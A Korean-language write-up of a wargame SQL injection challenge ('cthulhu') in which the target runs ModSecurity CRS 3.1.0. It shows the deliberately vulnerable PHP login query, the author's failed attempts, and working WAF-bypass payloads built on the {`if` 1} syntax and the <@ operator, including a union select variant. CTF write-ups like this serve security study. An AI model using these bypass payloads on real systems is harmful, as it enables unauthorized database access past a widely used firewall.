cthulhu
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| modsec.rubiya.kr server is running ModSecurity Core Rule Set v3.1.0 with paranoia level 1(default).
It is the latest version now.(2019.05)
Can you bypass the WAF?
query : select id from prob_cthulhu where id='' and pw=''
<?php
include "./welcome.php";
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)|admin/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)|admin/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_cthulhu where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("cthulhu");
highlight_file(__FILE__);
?>
|
Solution
1
2
3
4
5
6
7
8
| 필터링 되있는 것이 union, select, or 1 인 것 같음.
우선 대소문자 변형으로 해봄. -> uNiON, seLEct -> 실패
공백 우회 -> 실패
' union select 1 #을 url encode -> 실패
%27%20%75%6E%69%6F%6E%20%73%65%6C%65%63%74%20%31%23
|
CRS 3.1.0 sql injection bypass라 치면 나오는데 2가지가 있음.
1. {a b}
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1167
1
2
3
4
5
| {`a` b}에서
a는 if(), version() 같은 함수 이름들이 들어가고 (아무거나 쓰면 됨)
b는 sql문이 들어가게 됨.
|
1
2
3
4
5
6
7
8
9
10
11
| mysql> select id from rubiya where id='' or {`if` 1};
mysql> select id from rubiya where id='' or {`version` 1};
mysql> select id from rubiya where id='' or {`replace` 1};
+-------+
| id |
+-------+
| admin |
| guest |
| Admin |
+-------+
3 rows in set (0.00 sec)
|
1
2
3
4
| ?id=' or {`if` 1} %23
?id=' or {`version` 1} %23
?id=' or {`if` id=0x61646D696E} %23
?id=' or {`if` /*!50000id=0x61646D696E*/} %23 -> 안됨
|
2. <@
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1181
<@으로 WAF 우회가 가능하다는 것.
1
2
3
4
5
6
7
| mysql> select ''<@1;
+-------+
| ''<@1 |
+-------+
| NULL |
+-------+
1 row in set (0.00 sec)
|
1
2
3
4
5
6
7
8
9
10
11
12
| mysql> select id from rubiya where id='-1'<@=1 or 1;
mysql> select id from rubiya where id=''<@=0 or 1;
mysql> select id from rubiya where id=''<@=2 or 1;
mysql> select id from rubiya where id=''<@ or 1;
mysql> select id from rubiya where id=''<@;
+-------+
| id |
+-------+
| admin |
| guest |
| Admin |
+-------+
|
결국엔 id=NULL or 1이 되는 듯함.
그리고 이 방법으로 union select도 사용 가능!!!!!!
1
2
3
4
5
6
| CRS 3.1.0 WAF bypass -> {`a` b}, <@
?id=-1'<@=1 OR {a 1}=1 OR '
?id='<@ or 1 %23
?id=' <@=2 or 1 %23
?id=' <@ union/**/select 1 %23
|